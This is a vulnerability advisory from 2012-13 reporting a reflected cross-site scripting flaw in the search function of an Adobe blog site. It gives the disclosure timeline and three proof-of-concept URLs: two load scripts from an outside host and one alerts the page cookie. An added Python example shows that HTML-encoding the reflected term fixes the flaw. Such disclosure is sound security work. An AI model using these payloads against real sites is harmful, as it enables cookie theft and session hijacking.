----------------------------------------------------------------------------------------------------
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
Vendor : Adobe Systems Incorporated (http://www.adobe.com)
Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks
Advisory time-line
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
Adobe PSIRT has not responded to any requests after 09-Nov-2012
- Packet Storm advisory : 19-Jan-2013
Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function
Test #1: Remote JavaScript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8
Test #2: Remote JavaScript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8
Test #3: Alert test with image tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8
Note: the JavaScript test cases are not malicious.
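
All three test URLs start the query value with "> which closes a double-quoted attribute and its tag before new markup begins. The following is an added example, not part of the original advisory and not Adobe's code: it replays Test #3 against a hypothetical template that is assumed to echo the search term into an input value attribute, and shows that HTML-encoding the term on output keeps it inside the attribute. TEMPLATE and all function names are illustrative.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Test #3 URL exactly as listed in the advisory.
TEST3_URL = ("http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html"
             "?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E"
             "&blog=search&_charset_=UTF-8")

# Assumption: a hypothetical search box that echoes the term back into a
# double-quoted attribute. The real page markup is not shown in the advisory.
TEMPLATE = '<form><input type="text" name="query" value="{}"></form>'


class TagCollector(HTMLParser):
    """Records every start tag and its attributes as the HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def search_term(url):
    """Return the URL-decoded 'query' parameter, as the server would receive it."""
    return parse_qs(urlsplit(url).query)["query"][0]


def render_unsafe(term):
    """Reflect the term verbatim (the behaviour the advisory reports)."""
    return TEMPLATE.format(term)


def render_encoded(term):
    """Reflect the term with &, <, >, \" and ' HTML-encoded for attribute context."""
    return TEMPLATE.format(escape(term, quote=True))


def parsed_tags(markup):
    """Parse markup and return the list of (tag, attributes) it contains."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags
```

Comparing parsed_tags(render_unsafe(t)) with parsed_tags(render_encoded(t)) makes a usable regression check: the encoded page must contain only the template's own elements, with the full search term recovered as the value attribute.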
Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.